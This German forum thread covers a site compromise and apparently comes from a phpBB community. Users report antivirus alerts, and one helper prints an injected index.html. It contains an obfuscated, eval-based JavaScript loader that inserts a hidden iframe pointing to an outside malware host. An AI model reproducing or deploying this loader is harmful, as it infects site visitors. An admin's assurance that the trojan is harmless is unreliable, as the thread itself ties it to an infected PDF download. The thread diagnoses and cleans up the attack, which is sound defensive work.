VIRUSWARNUNG - Nicht so Wild....

[OnkelAdmin]

Hallo an alle,

zu der Warnung am Anfang der Website, ich kann z.Z. nicht sagen woher sie kommt, was ich aber sagen kann, die WebSite hat zu 100% KEINEN VIrus oder ähnliches. Ich arbeite dran und halte euch auf dem Laufenden.


gruss


Sascha

[finchen]

Huhu Sascha...

Ich hatte heute 1 einziges Mal Trojaner Meldung...
Das war heute Morgen, als auch auf der Startseite stand,
dass das Forum zur Zeit nicht zur Verfügung steht, wegen Wartungsarbeiten...

Genau in dem Moment kam bei mir die Trojaner Warnung...

Liebe Grüße

BIRGIT

[Tom]

Jep, ging mir genau so wie Finchen
Ich kämpfe seitdem mit "Downloader". Ist nach Symantec-Beschreibung ein harmloser, nervt nur.
Hoffe ihn jetzt besiegt zu haben.

Tom

[Tom]

Hallo Admin,

zur Eingrenzung (ich hab es jetzt auf einem zweiten Computer probiert- das selbe):
Beim Öffnen des Forums wird versucht ein infiziertes pdf herunterzuladen:
Sophos sagt:
File "C:\Documents and Settings\....\Local Settings\Temporary Internet Files\Content.IE5\OX6X8ZK7\pdf[1].pdf" belongs to virus/spyware 'Troj/PdfEx-AP'.

Du solltest der Sache nachgehen.
Good Luck

Tom

[phpBB3-Magic]

Hallo Gemeinde,

im Verzeichnis: files (da wo z.B. die Dateianhänge gespeichert werden, gibt es eine Datei namens "index.html"
diese Datei sollte ansich wie folgt aussehen.

Code: Alles auswählen

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" text="#000000">

</script>
</body>
</html>

Tatsächlich schaut sie aber so aus!

Code: Alles auswählen

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" text="#000000">


<script language="JavaScript" type="text/javascript">
BF5DCAFDE398="p";BF5DCAFDE398+="arseIn";BF5DCAFDE398+="t";D64D723A3A7="String.";D64D723A3A7+="f";D64D723A3A7+="r";D64D723A3A7+="omCharCo";D64D723A3A7+="de";function FDD906A0A16C131(EC0A0573){var B8F9EF248AD=569;B8F9EF248AD=B8F9EF248AD-553;A5B1A8=eval(BF5DCAFDE398+"(EC0A0573,B8F9EF248AD)");return(A5B1A8);}function FD2F5(B9DD0D40986EC){var BE120A36=426;BE120A36=BE120A36-424;var EAEA4CC87BC="";for(BE9A3CF79A1F=0;BE9A3CF79A1F<B9DD0D40986EC.length;BE9A3CF79A1F+=BE120A36){EAEA4CC87BC+=( eval(D64D723A3A7+"(FDD906A0A16C131(B9DD0D40986EC.substr(BE9A3CF79A1F,BE120A36)))"));}eval(EAEA4CC87BC);}FD2F5("69662028646F63756D656E742E636F6F6B69652E73656172636828227A6D6E3D342229203D3D202D3129207B0A6F767779663D646F63756D656E742E676574456C656D656E744279496428276C6F6B6D6527293B6966286F767779663D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6C6F6B6D65207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227A6D6E3D343B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>
</body>
</html>

Im java-Script wird also versucht eine Seite zu laden, von wo aus der Virus dann übertragen wird.


Ich habe die Datei wieder in den Originalzustand gebrach, und schaue noch nach, ob sich ähnliches noch an anderer stelle findet.

[Admin2]

Das muß jetzt mal gesagt sein:
Sie sind klasse. Schon gestern die Zeit am Telefon, die Sie geholfen haben und das heute, wow!
Da kann man nicht genug danke sagen!
Ein so hilfsbereiter Mensch ist mir selten begegnet.

Und das Forum wird künftig bei Ihnen gehostet, völlig klar.
Danke

[Admin2]

Herr Wagner alias phpbb3-magic Admin, (der hier früher kurzzeit Admin war, die Arbeiten leider aber nicht mehr fortführen KONNTE) hat hier bei diesem Problem so hilfreiche, schnelle und uneigennützige Arbeit geleistet, daß wir nun mal ausdrücklich Werbung machen, was sonst im Forum ja nicht erwünscht ist. Die Forumsleitung hatte es sowieso vor, aber nun steht es fest, daß das Forum künftig bei ihm gehostet wird. Da sind dann zeitnaheste Sicherheitsupdates und Backups des Forums automatisch im Service drin. Nach so einem Service kann man sonst lange suchen. Vielen Dank.

Werbung für
EDV-Dienstleistungen Wagner
http://www.yoserv.de/
Entwickler von http://www.phpbb3-magic.de und damit auch unserem Forum mit Portalsseite.

[OnkelAdmin]

hallo phpBB3-Magic,

die index.html habe ich den letzten 3 tagen bestimmt 10 mal zurückgesetzt, immer wieder das gleiche, z.Z. übrigens wieder, setzte sie jetzt nochmal zurück.


gruss


sascha

[Admin2]

Bei mir geht weder das eine Virenprogramm noch das andere Virenprogramm bei verschiedenen abendlichen Scandurchläufen mehr Alarm, weder bei meinen Rechnern noch beim Anklicken des Forums.
An die User:
In jedem Fall geht von diesem Trojaner kein Schadenspotential aus.
Wir werden Euch weiter informieren.

Gruß Admin